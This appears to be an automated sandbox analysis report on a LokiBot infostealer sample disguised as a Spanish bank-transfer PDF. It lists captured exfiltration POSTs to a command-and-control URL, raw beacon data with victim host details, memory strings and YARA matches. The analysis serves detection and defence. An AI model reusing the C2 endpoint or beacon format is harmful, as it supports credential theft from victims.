Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close

Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: transferencia bancaria.pdf.exe, 00000001.00000002.513374760.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://sempersim.su/gl21/fre.php
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: unknown

HTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 196Connection: close

Source: unknown

DNS traffic detected: queries for: sempersim.su

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: transferencia bancaria.pdf.exe

Source: transferencia bancaria.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
